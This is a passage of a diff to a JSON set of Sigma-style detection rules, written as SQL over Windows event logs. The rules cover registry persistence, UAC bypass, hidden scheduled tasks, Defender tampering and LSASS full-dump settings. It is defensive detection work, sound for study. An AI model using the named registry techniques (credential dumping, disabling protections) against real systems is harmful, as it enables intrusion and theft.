"experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR 
NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_set_comhijack_sdclt.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order 
to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC 
Printer%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Potential Persistence Via Visual Studio Tools for Office", - "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "status": "experimental", - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "author": "Bhabesh Raj", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1137.006", - "attack.persistence" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate Addin Installation" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_persistence_office_vsto.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Wow6432Node CurrentVersion Autorun Keys Modification", - "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "title": "Enable Local Manifest Installation With Winget", + "id": "fa277e82-9b78-42dd-b05c-05555c7b6015", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects changes to the AppInstaller (winget) policy. 
Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Administrators or developers might enable this for testing purposes or to install custom private packages" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (NewValue LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR NewValue = 'grpconv -o' OR NewValue LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND NewValue LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND NewValue LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND NewValue LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Package 
Cache%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND NewValue LIKE '% /burn.runonce' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\AppInstaller\\\\EnableLocalManifestFiles' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" + "filename": "registry_set_winget_enable_local_manifest.yml" }, { - "title": "Outlook Security Settings Updated - Registry", - "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects changes to the registry values related to outlook security settings", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", "author": "frack113", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1547.010" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" ], - "filename": "registry_set_office_outlook_security_settings.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". 
Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "title": "Classes Autorun Keys Modification", + "id": "9df5f547-c86a-433e-b533-f2794357e242", "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ "attack.persistence", - "attack.t1112" + "attack.t1547.001" 
], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewValue = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_set_asep_reg_keys_modification_classes.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType 
= 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1112" + "attack.t1053.005" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE 
'%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Potential Persistence Via COM Search Order Hijacking", - "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "status": "experimental", - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Some installed utilities (i.e. 
